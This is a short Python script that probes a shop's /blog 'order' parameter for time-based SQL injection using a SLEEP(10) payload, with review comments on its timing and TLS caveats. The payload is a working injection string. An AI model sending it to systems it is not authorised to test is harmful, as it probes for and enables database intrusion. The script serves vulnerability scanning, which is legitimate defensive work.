scan.py
#!/usr/bin/env python
import requests
import argparse
import datetime
import uuid
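# Time-based probe for SQL injection in the `order` query parameter of
# <base_url>/blog. One GET is sent whose `order` value carries a SLEEP(10)
# sub-select; a delayed response is reported as VULN, anything else as SAFE.
#
# Caveats when reading the verdict:
#   * Only one timing sample is taken and there is no baseline request, so a
#     page that is slow for unrelated reasons (> DELAY_THRESHOLD) reads as VULN.
#   * SAFE only means this one parameter on this one path did not delay; it
#     says nothing about other parameters or endpoints.

# A response slower than this is treated as evidence that SLEEP() was executed.
DELAY_THRESHOLD = datetime.timedelta(seconds=3)
# Upper bound (seconds) on waiting for the server, so an unresponsive host
# cannot hang the scan forever. Kept well above the 10 s SLEEP in the payload.
REQUEST_TIMEOUT = 60

parser = argparse.ArgumentParser()
parser.add_argument('base_url', type=str, help="The base url of the shop, e.g. http://amsterdamflowers.nl/")
args = parser.parse_args()
base_url = args.base_url.rstrip('/')

# Random per-run tag embedded in the payload text; presumably there so the
# probe can be recognised in the shop's query/access logs (confirm with the
# author). Bound to its own name so the `uuid` module is not shadowed.
probe_id = uuid.uuid4()

# Payload text is unchanged from the original probe.
payload = " AND 1=((SELECT 'THIS IS BYTE TESTING YOUR SHOP %s' FROM (SELECT SLEEP(10))A)) OR 1234=4321" % probe_id
probe_url = "%s/blog?order=created_time%s" % (base_url, payload)

start = datetime.datetime.now()
try:
    response = requests.get(
        probe_url,
        headers={"Cache-Control": "no-cache"},
        # NOTE(review): TLS certificate verification is off, so over https the
        # timing and verdict could come from a host other than the intended
        # shop. Kept as in the original, presumably to tolerate self-signed
        # certificates.
        verify=False,
        timeout=REQUEST_TIMEOUT,
    )
except requests.exceptions.RequestException as exc:
    # No usable response means no verdict; exit non-zero instead of guessing.
    elapsed = datetime.datetime.now() - start
    raise SystemExit(
        "INCONCLUSIVE: request failed after %.3f seconds: %s"
        % (elapsed.total_seconds(), exc)
    )
duration = datetime.datetime.now() - start

vulnerable = duration > DELAY_THRESHOLD
if vulnerable:
    # total_seconds() replaces the original "%s.%s" % (seconds, microseconds),
    # which dropped the zero padding (10 s + 5000 us was printed as "10.5000").
    print("VULN: response took %.3f seconds and returned %s" % (duration.total_seconds(), response.status_code))
else:
    print("SAFE (%s)" % response.status_code)
# The URL as actually sent (after percent-encoding by requests), for the record.
print(response.request.url)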